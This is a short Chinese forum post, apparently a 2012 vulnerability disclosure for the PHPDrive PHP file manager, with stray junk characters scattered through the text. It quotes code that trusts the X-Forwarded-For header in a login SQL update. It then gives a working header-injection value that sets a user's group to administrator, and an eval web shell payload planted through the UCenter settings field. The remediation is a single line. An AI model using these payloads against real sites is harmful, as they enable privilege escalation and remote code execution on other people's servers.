PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等* X$ i/ T, X( o( }1 R/ r& Z; p
9 ^& W. O0 k wincludes/user.lib.php J! y: }4 j' I, ?; d$ k7 O$ [1 \
行876 V- F$ `, v. z2 f. M
function get_ip() {
, j' f: `! a& S+ d; D if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.
/ S4 o5 c8 w; j0 j5 ~在用户注册与登录 处module/disk/account.lead.php$ ]. P& _! K( f7 U+ f% k
198行
3 C: Q/ v. f- D( F. U" a //更新本次登录IP和时间
) O/ P6 D) S! l$ ? $db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生6 }2 ?3 q6 B" N# h. B8 R: e! l9 C
由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限7 l5 Q8 X# }7 }( Z
实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.* k7 F& T9 y. T9 g% z
后台getshell:: d, |' P: m) P+ ?
在UCenter设置处,将UC数据库登录名填写为
& x% G1 M- @* O& @: p4 O" [* {
% Y% @1 u; l* h! [: broot’);eval($_POST[DisKill]);?>/*! Z% d9 Q# n4 r0 R& C6 ~7 _5 K2 ~
可以得到一个shell,位置在 data/uc.data.php9 ]- M$ q2 m, s; U+ u5 J
0 U1 P0 V; \0 _$ |: N" W9 M2 g/ D修复:过滤注入" \! e5 A+ E; m. o
( k. o$ [+ q$ y0 J9 t
|
发表于 2012-12-31 09:18:34
收藏
支持
反对